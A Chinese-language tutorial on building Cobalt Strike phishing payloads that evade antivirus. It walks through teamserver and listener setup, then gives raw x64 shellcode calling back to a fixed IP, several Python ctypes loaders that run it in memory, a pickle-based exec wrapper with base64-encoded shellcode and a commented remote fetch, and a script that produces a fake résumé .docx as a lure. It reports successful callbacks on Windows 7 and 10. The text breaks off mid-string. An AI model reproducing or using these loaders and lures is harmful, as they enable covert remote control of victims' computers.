作者:儒道易行
CS的python免杀钓鱼
文件源码:https://github.com/rdyx0/Anti-AntiVirus
1.kali的ip为192.168.43.247
启动团队服务器(TeamServer),需要以root身份运行,并且需要添加两个必选参数。第 一个是团队服务器的外部可访问地址,第二个是用于团队成员将CobaltStrike客户端连接到
团队服务器的密码。本节示例IP为192.168.43.247,登录密码设置为admin
./teamserver 192.168.43.247 admin
如图所示
2.连接团队服务器 在命令终端运行Cobalt Strike,填写IP地址为192.168.43.247,Cobalt Strike启动时的默认 端口为50050,昵称可以根据自己的喜好填写,这里写成admin,密码为服务端启动时设置 的密码admin,详细配置信息如图 点击Connect按钮后便成功登录团队服务器。如图所示为成功登录后的Cobalt Strike运行 界面。Cobalt Strike的主界面主要分为菜单栏、快捷功能区、目标列表区、控制台命令输 出区和控制台命令输入区。
如果这是你第一次连接至此团队服务器, Cobalt Strike 会询问你是否承认这个团队服务器 的 SHA256 hash。如果你承认,那么按 OK ,然后 Cobalt Strike 的客户端就会连接到这 个团队服务器。Cobalt Strike 也会在未来的连接中记住这个 SHA256 hash。你可以通过 Cobalt Strike → Preferences → Fingerprints 来管理这些团队服务器的 hash。
如图所示为成功登录后的Cobalt Strike运行界面。Cobalt Strike的主界面主要分为菜单 栏、快捷功能区、目标列表区、控制台命令输出区和控制台命令输入区。
∙菜单栏:集成了Cobalt Strike的所有功能。
∙快捷功能区:列出了常用功能。
∙目标列表区:根据不同的显示模式,显示已获取权限的主机及目标主机。
∙控制台命令输出区:输出命令执行结果。
∙控制台命令输入区:用户输入的命令。
3.建立Listener 现在可以利用Cobalt Strike获取一个Beacon。可以通过在菜单栏选择Cobalt Strike→Listeners命令进入Listeners面板,如图
在Listeners面板中点击Add按钮,新建一个监听器,如图
在弹出的对话框中点击Save按钮后会弹出一个窗口,依次在窗口中输入名称、监听类型、 Cobalt Strike运行服务的IP地址、监听端口号。其中,监听器一共有9种类型,beacon系 列为Cobalt Strike自带类型,分别有DNS、HTTP、HTTPS、SMB、TCP。foreign系列用 于配合外部监听器,可使用其他主机远程控制Cobalt Strike中的主机,一般配合MSF使 用。这里选择监听器类型为HTTP方式,点击Save按钮进行保存,如图
4.生成Payload 这里使用Pakages生成一个Payload。在菜单栏中依次选择Attacks→Pakages→Payload Generator命令,如图
保持默认配置,选择已经创建的监听器,设置输出类型为python,注意勾选x64,然后点击Launch按钮, 如图
点击Launch按钮以后,会出现一段python类型的Payload代码,如下所示,将其保存到桌面,并复制下来
# length: 799 bytes buf = "x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\xcf\xdb\x00\xaa\xb0\x22\xd8\xbf\x41\x39\x75\x28\x7f\xdb\xa2\x1c\x0c\xcf\x54\x44\x37\xbd\x4f\x7e\xc6\xcf\x84\xb4\xab\xb2\x89\x4e\x8f\xda\x74\x2e\xbb\x70\xc1\xae\x1c\xba\x20\x68\xba\x61\x5f\x66\xf5\x52\x67\x44\xc9\xfc\x3a\xf4\x46\x19\x74\x67\x2c\x09\x99\x8d\x08\x58\x08\xf8\x8f\xe8\x62\x71\x20\xd6\xaa\x74\x38\x65\x4a\x51\x90\x89\xc8\x80\xe5\x7e\xda\xce\x8d\xbc\xf6\x89\x20\xc7\xf7\x36\xea\x49\xd8\xe8\x08\x69\x26\x35\xcd\x2a\xd7\x17\xb1\xbf\x00\x27\x86\x7d\x87\x34\xf0\xe9\x45\x05\x10\x4d\x27\x1d\xb3\x5d\x0b\x91\xcd\xa3\xb6\x89\x54\xee\x69\x35\xe7\x61\xb4\x26\x99\x9c\xac\xad\x61\xe2\xea\x49\xed\xcb\x15\xf2\x7d\x18\x3c\xab\x81\x0c\xf1\x1c\xde\x37\x29\x69\xe4\x3c\x48\x9e\x77\x62\x2f\xad\x7e\x9b\xb9\x73\xe5\x95\xd2\x95\xc0\x7b\x68\xf4\x17\x02\x6b\x28\x8c\x55\xd2\x4b\xc5\xe7\x80\xc9\x5d\x8f\x20\x61\xd3\x61\x90\x99\xe1\x9e\x86\x0e\xd0\x0c\xcb\x12\xaa\x31\xc0\x73\x31\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x33\x2e\x32\x34\x37\x00\x51\x09\xbf\x6d"
编写python2脚本1:
from ctypes import * import ctypes # length: 891 bytes buf = "x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x53\x4f\x7a\x41\x00\xfd\x77\x2a\xb4\x43\xb4\x12\x7b\xdc\x1d\x54\x43\xd1\xd4\xe3\x28\xc6\x83\x20\xe1\x0c\xbe\x02\xa4\xe0\xca\x85\x06\x01\x4a\x14\xcb\xd4\x91\xc1\xa6\x70\xf8\xc0\xb4\x5b\x86\x7f\x46\x9f\x2b\xc2\xc9\x2d\x19\x58\xc6\xce\x86\x24\xe9\xfe\x48\x3b\xcf\xcf\xac\xfe\xb3\xc4\x70\xfb\x61\x1b\x01\xc8\xb6\x7f\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x71\x64\x65\x73\x6b\x20\x32\x2e\x34\x2e\x31\x32\x36\x33\x2e\x32\x30\x33\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x0d\x0a\x00\xf1\x32\x9e\x7b\xe9\xc7\x75\xa7\x24\x8f\x5f\x0d\x3a\xde\x32\xde\x02\x1b\xe2\xb9\x4b\x25\x2b\x0e\x97\xf8\x04\xc7\x68\x05\x62\xf6\x93\x9c\xec\x5e\x49\x7c\xfa\x29\x29\x28\xc7\x26\xaf\x73\x26\xef\x04\x4d\x14\x09\x5c\x04\xec\x59\xee\x33\xf9\xca\xdc\x2d\x0c\x8c\x57\x53\x02\xc9\x09\x11\x86\x93\xa7\xa1\x9c\xb8\x28\xc2\x76\x6f\xdf\x38\x8d\x35\xec\xa7\x93\xf2\xba\x03\x75\x38\x90\x34\x84\x7e\xc1\x35\x18\x76\x70\xea\xac\xe2\x47\x1f\xb4\x4f\x8b\x33\x58\x72\xf6\x42\xf0\x3c\xbb\x74\x96\xd6\x57\x95\x0e\x98\x02\xda\xaf\x20\xaf\xc7\x0b\xf2\x8e\xc6\x6c\x9d\x42\x70\x4e\xaf\x09\xb0\x16\xf1\x6e\x93\x3b\xfb\x6c\x2f\x7f\xe3\x8b\xc5\x0c\xc4\x8f\xcb\xdd\x73\xfc\xb0\x04\x1d\x81\x17\x91\x49\x91\x17\xb3\xbc\x45\x2a\x65\xa0\x57\x72\x82\x85\xd6\x44\x18\x59\x11\x5e\x58\xbc\x92\xd1\x9a\x0e\x6e\x1f\x9a\xed\x1c\x51\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x33\x2e\x32\x34\x37\x00\x51\x09\xbf\x6d" #libc = CDLL('libc.so.6') PROT_READ = 1 PROT_WRITE = 2 PROT_EXEC = 4 def executable_code(buffer): buf = c_char_p(buffer) size = len(buffer) addr = libc.valloc(size) addr = c_void_p(addr) if 0 == addr: raise Exception("Failed to allocate memory") memmove(addr, buf, size) if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC): raise Exception("Failed to set protection on buffer") return addr VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc VirtualProtect = ctypes.windll.kernel32.VirtualProtect shellcode = bytearray(buf) whnd = ctypes.windll.kernel32.GetConsoleWindow() if whnd != 0: if 666==666: ctypes.windll.user32.ShowWindow(whnd, 0) ctypes.windll.kernel32.CloseHandle(whnd) print ".................................."*666 memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) old = ctypes.c_long(1) VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old)) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell), buf, ctypes.c_int(len(shellcode))) shell = cast(memorywithshell, CFUNCTYPE(c_void_p)) shell()
注意要使用python2运行
查看cs,已上线(win10,win7)
编写python2脚本2:
import ctypes payload = "x9f\x71\x2c\xa7\x91\xac\x87\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\xca\xc5\x9b\x84\xc7\xdf\xd0\x47\x4e\xad\xc9\xde\xe3\xf7\x71\xe3\x66\x9a\xcb\xd5\x5b\x66\x4e\x04\x3c\xc1\xeb\x4f\x36\x66\x4c\xad\x02\x60\xa1\xcc\x07\x19\x2f\x83\xeb\xd3\x7c\x7e\x4a\x78\x15\xef\xce\x50\xbe\xcd\xc0\x96\xef\x61\x94\x6c\x69\xe5\xc7\x19\x59\x48\x45\x24\x4c\xd3\xd8\xc1\x4d\x94\x43\x5e\x2b\x65\x5f\xea\x87\x7d\x6a\x03\x28\xfe\xcd\x83\x9a\x3d\xd0\x75\x65\x9d\x31\x89\xbc\x91\x9f\x24\xdd\x7c\xa4\x5b\xbd\xc6\x4b\xbe\xf9\xbf\x52\x82\xa4\xa1\x87\xf2\x35\x4e\x2a\x32\x1f\x12\xbf\x35\x1c\x06\xb1\x39\x14\xba\x25\x85\x14\xbc\x38\xb3\x80\x4e\x4b\xce\x72\x8e\xca\xdf\x1e\x04\x08\xfc\x93\x3f\xaf\xeb\x48\x00\x8d\xf4\x8e\x93\x92\x75\x8a\x95\x57\xe6\x64\x5b\x63\x1b\x7f\x9d\x37\xa6\x87\xf7\x40\x36\x27\x23\x54\xf3\x27\x92\xf0\xc8\xc9\xed\x85\x8f\x3b\x5c\x3e\x1c\x27\x21\xed\x56\xfb\x0c\x1a\xca\x4d\x64\x25\x15\xcc\x01\x92\xb9\xb7\xb4\x39\x51\x3f\x66\x3f\xfc\x1e\x62\x92\x5e\x9b\xd9\x3c\xb4\xce\xdd\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x33\x2e\x32\x34\x37\x00\x51\x09\xbf\x6d" shellcode = bytearray(payload) ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode))) ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
注意要使用python2运行
查看cs,已上线(win10)
编写python2脚本3:
import ctypes shellcode = "x36\x2e\x30\x29\x0d\x0a\x00\xca\xc5\x9b\x84\xc7\xdf\xd0\x47\x4e\xad\xc9\xde\xe3\xf7\x71\xe3\x66\x9a\xcb\xd5\x5b\x66\x4e\x04\x3c\xc1\xeb\x4f\x36\x66\x4c\xad\x02\x60\xa1\xcc\x07\x19\x2f\x83\xeb\xd3\x7c\x7e\x4a\x78\x15\xef\xce\x50\xbe\xcd\xc0\x96\xef\x61\x94\x6c\x69\xe5\xc7\x19\x59\x48\x45\x24\x4c\xd3\xd8\xc1\x4d\x94\x43\x5e\x2b\x65\x5f\xea\x87\x7d\x6a\x03\x28\xfe\xcd\x83\x9a\x3d\xd0\x75\x65\x9d\x31\x89\xbc\x91\x9f\x24\xdd\x7c\xa4\x5b\xbd\xc6\x4b\xbe\xf9\xbf\x52\x82\xa4\xa1\x87\xf2\x35\x4e\x2a\x32\x1f\x12\xbf\x35\x1c\x06\xb1\x39\x14\xba\x25\x85\x14\xbc\x38\xb3\x80\x4e\x4b\xce\x72\x8e\xca\xdf\x1e\x04\x08\xfc\x93\x3f\xaf\xeb\x48\x00\x8d\xf4\x8e\x93\x92\x75\x8a\x95\x57\xe6\x64\x5b\x63\x1b\x7f\x9d\x37\xa6\x87\xf7\x40\x36\x27\x23\x54\xf3\x27\x92\xf0\xc8\xc9\xed\x85\x8f\x3b\x5c\x3e\x1c\x27\x21\xed\x56\xfb\x0c\x1a\xca\x4d\x64\x25\x15\xcc\x01\x92\xb9\xb7\xb4\x39\x51\x3f\x66\x3f\xfc\x1e\x62\x92\x5e\x9b\xd9\x3c\xb4\xce\xdd\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x33\x2e\x32\x34\x37\x00\x51\x09\xbf\x6d" rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40) ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode)) handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0) ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
运行脚本,查看cs,已上线(win7)
将生成的 payload 经过 base64 编码
构造python2免杀脚本:
将 base64 之后的 payload 放入 HTTP 服务器(也可本地加载)。使用下面代码进行反序列化。
import base64 import pickle shellcode = """ import ctypes,urllib.request,codecs,base64 #shellcode = urllib.request.urlopen('http://127.0.0.1:8000/test.txt').read() shellcode = 'hmZlx4ZmZceGZmXHg1ZFx4NmFceDAwXHg0OVx4YmVceDc3XHg2OVx4NmVceDY5XHg2ZVx4NjVceDc0XHgwMFx4NDFceDU2XHg0OVx4ODlceGU2XHg0Y1x4ODlceGYxXHg0MVx4YmFceDRjXHg3N1x4MjZceDA3XHhmZlx4ZDVceDQ4XHgzMVx4YzlceDQ4XHgzMVx4ZDJceDRkXHgzMVx4YzBceDRkXHgzMVx4YzlceDQxXHg1MFx4NDFceDUwXHg0MVx4YmFceDNhXHg1Nlx4NzlceGE3XHhmZlx4ZDVceGViXHg3M1x4NWFceDQ4XHg4OVx4YzFceDQxXHhiOFx4NTBceDAwXHgwMFx4MDBceDRkXHgzMVx4YzlceDQxXHg1MVx4NDFceDUxXHg2YVx4MDNceDQxXHg1MVx4NDFceGJhXHg1N1x4ODlceDlmXHhjNlx4ZmZceGQ1XHhlYlx4NTlceDViXHg0OFx4ODlceGMxXHg0OFx4MzFceGQyXHg0OVx4ODlceGQ4XHg0ZFx4MzFceGM5XHg1Mlx4NjhceDAwXHgwMlx4NDBceDg0XHg1Mlx4NTJceDQxXHhiYVx4ZWJceDU1XHgyZVx4M2JceGZmXHhkNVx4NDhceDg5XHhjNlx4NDhceDgzXHhjM1x4NTBceDZhXHgwYVx4NWZceDQ4XHg4OVx4ZjFceDQ4XHg4OVx4ZGFceDQ5XHhjN1x4YzBceGZmXHhmZlx4ZmZceGZmXHg0ZFx4MzFceGM5XHg1Mlx4NTJceDQxXHhiYVx4MmRceDA2XHgxOFx4N2JceGZmXHhkNVx4ODVceGMwXHgwZlx4ODVceDlkXHgwMVx4MDBceDAwXHg0OFx4ZmZceGNmXHgwZlx4ODRceDhjXHgwMVx4MDBceDAwXHhlYlx4ZDNceGU5XHhlNFx4MDFceDAwXHgwMFx4ZThceGEyXHhmZlx4ZmZceGZmXHgyZlx4NDNceDYxXHg3NVx4NDRceDAwXHg1Y1x4MGFceGE0XHg1ZFx4YmVceDhlXHg3M1x4NjBceGJmXHgyY1x4OTVceGUwXHhiZFx4YzJceGJmXHg4Zlx4MTBceGE2XHhkY1x4ODdceDcyXHhhN1x4OGJceDBjXHgxN1x4MTZceGJlXHgyMFx4ZWJceDdiXHg3M1x4ZjRceGJmXHgxNlx4ZThceDBhXHgwMlx4MzBceDZiXHhkY1x4YmVceDg5XHhjZVx4YjFceGMzXHhkM1x4NGVceDM1XHg4OVx4ODRceDNjXHgwNlx4MDVceGM3XHhhYVx4OTZceDBiXHgzNVx4NGNceDE5XHhkYVx4NjhceDlmXHg3M1x4ZTFceGE2XHg1ZVx4NDlceDI1XHhjN1x4YTZceGI1XHg4Nlx4MDBceDU1XHg3M1x4NjVceDcyXHgyZFx4NDFceDY3XHg2NVx4NmVceDc0XHgzYVx4MjBceDRkXHg2Zlx4N2FceDY5XHg2Y1x4NmNceDYxXHgyZlx4MzVceDJlXHgzMFx4MjBceDI4XHg2M1x4NmZceDZkXHg3MFx4NjFceDc0XHg2OVx4NjJceDZjXHg2NVx4M2JceDIwXHg0ZFx4NTNceDQ5XHg0NVx4MjBceDM5XHgyZVx4MzBceDNiXHgyMFx4NTdceDY5XHg2ZVx4NjRceDZmXHg3N1x4NzNceDIwXHg0ZVx4NTRceDIwXHgzNlx4MmVceDMxXHgzYlx4MjBceDU3XHg0Zlx4NTdceDM2XHgzNFx4M2JceDIwXHg1NFx4NzJceDY5XHg2NFx4NjVceDZlXHg3NFx4MmZceDM1XHgyZVx4MzBceDNiXHgyMFx4NGVceDUwXHgzMFx4MzZceDI5XHgwZFx4MGFceDAwXHgzZlx4MDhceGZiXHgyNlx4OTJceGU3XHg0Zlx4MjZce' shellcode = base64.b64decode(shellcode) shellcode =codecs.escape_decode(shellcode)[0] shellcode = bytearray(shellcode) # 设置VirtualAlloc返回类型为ctypes.c_uint64 ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 # 申请内存 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) # 放入shellcode buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory( ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)) ) # 创建一个线程从shellcode防止位置首地址开始执行 handle = ctypes.windll.kernel32.CreateThread( ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)) ) # 等待上面创建的线程运行完 ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))""" class A(object): def __reduce__(self): return (exec, (shellcode,)) ret = pickle.dumps(A()) ret_base64 = base64.b64encode(ret) print(ret_base64) #ret_decode = base64.b64decode(ret_base64)
反序列化结果如下
使用下面代码运行生成,并伪造简历.docx
from docx import Document from docx.shared import Pt,Inches from docx.shared import RGBColor from docx.enum.text import WD_PARAGRAPH_ALIGNMENT if __name__ == '__main__': document = Document() title = document.add_heading(text=u'xxx求职简历',level=1) #标题居中 title.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER document.add_paragraph(text='xxx毕业于xxx大学', style=None) run1 = document.add_paragraph( style=None).add_run(text='xxx获得多少张证书') run1.font.size = Pt(16) # 设置大小为11磅 run1.font.color.rgb = RGBColor(0, 255, 0) # 设置为蓝色 这个可以查找RGB颜色对照表 #添加表格 table = document.add_table(rows=5, cols=5, style='Table Grid') # 单元格合并 table.cell(0, 0).merge(table.cell(0, 4)) #第一行合并 table.cell(1, 0).merge(table.cell(2, 2)) #第二行的123列和第3行的123列合并 table.cell(0, 0).add_paragraph('xxx求职简历') table.cell(1, 0).add_paragraph('技能如下') #换行 document.add_paragraph('\n') #添加图片 document.add_picture('桌面.jpg', width=Inches(4)) # 添加图片并且居中 paragraph = document.add_paragraph() # 图片居中设置 paragraph.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER run = paragraph.add_run("") run.add_picture('桌面.jpg',width=Inches(4)) #保存word文档 document.save('简历.docx') import base64,pickle,ctypes,urllib.request shellcode=b'1V3WEhnMU9GeDROREZjZURVNVhIZzFZVng0TkRoY2VEaGlYSGd4TWx4NFpUbGNlRFJtWEhobVpseDRabVpjZUdabVhIZzFaRng0Tm1GY2VEQXdYSGcwT1Z4NFltVmNlRGMzWEhnMk9WeDRObVZjZURZNVhIZzJaVng0TmpWY2VEYzBYSGd3TUZ4NE5ERmNlRFUyWEhnME9WeDRPRGxjZUdVMlhIZzBZMXg0T0RsY2VHWXhYSGcwTVZ4NFltRmNlRFJqWEhnM04xeDRNalpjZURBM1hIaG1abHg0WkRWY2VEUTRYSGd6TVZ4NFl6bGNlRFE0WEhnek1WeDRaREpjZURSa1hIZ3pNVng0WXpCY2VEUmtYSGd6TVZ4NFl6bGNlRFF4WEhnMU1GeDROREZjZURVd1hIZzBNVng0WW1GY2VETmhYSGcxTmx4NE56bGNlR0UzWEhobVpseDRaRFZjZUdWaVhIZzNNMXg0TldGY2VEUTRYSGc0T1Z4NFl6RmNlRFF4WEhoaU9GeDRPVEJjZURGbVhIZ3dNRng0TURCY2VEUmtYSGd6TVZ4NFl6bGNlRFF4WEhnMU1WeDROREZjZURVeFhIZzJZVng0TUROY2VEUXhYSGcxTVZ4NE5ERmNlR0poWEhnMU4xeDRPRGxjZURsbVhIaGpObHg0Wm1aY2VHUTFYSGhsWWx4NE5UbGNlRFZpWEhnME9GeDRPRGxjZUdNeFhIZzBPRng0TXpGY2VHUXlYSGcwT1Z4NE9EbGNlR1E0WEhnMFpGeDRNekZjZUdNNVhIZzFNbHg0TmpoY2VEQXdYSGd3TWx4NE5EQmNlRGcwWEhnMU1seDROVEpjZURReFhIaGlZVng0WldKY2VEVTFYSGd5WlZ4NE0ySmNlR1ptWEhoa05WeDRORGhjZURnNVhIaGpObHg0TkRoY2VEZ3pYSGhqTTF4NE5UQmNlRFpoWEhnd1lWeDROV1pjZURRNFhIZzRPVng0WmpGY2VEUTRYSGc0T1Z4NFpHRmNlRFE1WEhoak4xeDRZekJjZUdabVhIaG1abHg0Wm1aY2VHWm1YSGcwWkZ4NE16RmNlR001WEhnMU1seDROVEpjZURReFhIaGlZVng0TW1SY2VEQTJYSGd4T0Z4NE4ySmNlR1ptWEhoa05WeDRPRFZjZUdNd1hIZ3dabHg0T0RWY2VEbGtYSGd3TVZ4NE1EQmNlREF3WEhnME9GeDRabVpjZUdObVhIZ3dabHg0T0RSY2VEaGpYSGd3TVZ4NE1EQmNlREF3WEhobFlseDRaRE5jZUdVNVhIaGxORng0TURGY2VEQXdYSGd3TUZ4NFpUaGNlR0V5WEhobVpseDRabVpjZUdabVhIZ3labHg0TlRWY2VEVXhYSGcwTWx4NE56VmNlREF3WEhnNFlWeDRPVEJjZUdRMFhIaG1NRng0WmpOY2VHRTRYSGd4TVZ4NFptRmNlR0prWEhobVkxeDRZalZjZUdGaFhIaGlOMXg0T0RaY2VHSmpYSGhqWTF4NE5XWmNlR05rWEhnMVkxeDRNalZjZUdRd1hIZ3dOVng0Wm1WY2VEY3hYSGhrWlZ4NFpURmNlRFEwWEhneE1WeDRNMlZjZUdFNVhIZzNNbHg0Tm1SY2VHUTBYSGhpTVZ4NFpqTmNlR1psWEhoaE0xeDROVFpjZUdRNVhIaGpaVng0WVdKY2VEVmtYSGhoWmx4NE1EaGNlRGd3WEhoaVpWeDRZekZjZURGalhIZzRORng0T1daY2VERTJYSGc1Wmx4NE5URmNlRGszWEhnME5seDRZbVJjZURSaVhIZzNZbHg0TVRWY2VHVTBYSGd4Wmx4NE5qSmNlR05qWEhnek5GeDRaRGRjZURsa1hIZzBNMXg0WkRCY2VERTJYSGd3Tmx4NFl6VmNlR05oWEhnME0xeDRNREJjZURVMVhIZzNNMXg0TmpWY2VEY3lYSGd5WkZ4NE5ERmNlRFkzWEhnMk5WeDRObVZjZURjMFhIZ3pZVng0TWpCY2VEUmtYSGcyWmx4NE4yRmNlRFk1WEhnMlkxeDRObU5jZURZeFhIZ3labHg0TXpWY2VESmxYSGd6TUZ4NE1qQmNlREk0WEhnMk0xeDRObVpjZURaa1hIZzNNRng0TmpGY2VEYzBYSGcyT1Z4NE5qSmNlRFpqWEhnMk5WeDRNMkpjZURJd1hIZzBaRng0TlROY2VEUTVYSGcwTlZ4NE1qQmNlRE14WEhnek1GeDRNbVZjZURNd1hIZ3pZbHg0TWpCY2VEVTNYSGcyT1Z4NE5tVmNlRFkwWEhnMlpseDROemRjZURjelhIZ3lNRng0TkdWY2VEVTBYSGd5TUZ4NE16WmNlREpsWEhnek1seDRNMkpjZURJd1hIZzFOMXg0TkdaY2VEVTNYSGd6Tmx4NE16UmNlRE5pWEhneU1GeDROVFJjZURjeVhIZzJPVng0TmpSY2VEWTFYSGcyWlZ4NE56UmNlREptWEhnek5seDRNbVZjZURNd1hIZ3pZbHg0TWpCY2VEVTBYSGcyWmx4NE56VmNlRFl6WEhnMk9GeDRNMkpjZURJd1hIZzBaRng0TkRGY2VEUmpYSGcwTTF4NE5HRmNlRFV6WEhneU9WeDRNR1JjZURCaFhIZ3dNRng0TURaY2VHTmlYSGhoWWx4NE56QmNlR0U1WEhobFpGeDRZV05jZURZMVhIZ3pOVng0Tm1KY2VHRTNYSGhrT0Z4NE16TmNlR0V3WEhnMFlWeDRNak5jZURabVhIZzBObHg0TldSY2VERXpYSGhrTkZ4NE5tTmNlREF5WEhnM04xeDRNMkpjZURabVhIZzNZbHg0TjJKY2VEZGpYSGd3WlZ4NE1qSmNlRGRqWEhnd1pWeDRZakpjZURNd1hIaGlPRng0T1RCY2VETTRYSGc0WVZ4NFl6TmNlRGcyWEhnd1pWeDRaVFZjZURZeVhIaGtZVng0T1RSY2VETmtYSGhrWTF4NE0ySmNlR0l3WEhnMFlWeDRPV0pjZUdRMlhIZ3hZbHg0TVdSY2VESXdYSGcyWlZ4NFpqaGNlREV4WEhnNE5seDRPV1JjZURVMlhIaGpZMXg0WVdKY2VHSTNYSGhoT0Z4NE1qZGNlRFJqWEhneU1GeDRNVGRjZURsa1hIZzVOVng0TUdOY2VHTTRYSGcyTjF4NFpEUmNlR0V5WEhnMFpWeDRNalpjZURVeFhIaGtZVng0WmpOY2VHTmtYSGc0WVZ4NE9UVmNlR0V4WEhobE5WeDRNV1ZjZURoa1hIaGhNbHg0WWpWY2VEaGhYSGcxTTF4NE5ERmNlRFpqWEhnd1pWeDRNelZjZURNeVhIZ3lZbHg0TlRGY2VHRXlYSGd6Wmx4NFl6RmNlRFpsWEhoalpWeDRaR1pjZURNd1hIaGhObHg0TmpCY2VETTFYSGhpTlZ4NE5UTmNlRFJoWEhneU9GeDRZelpjZURjNFhIZ3pOV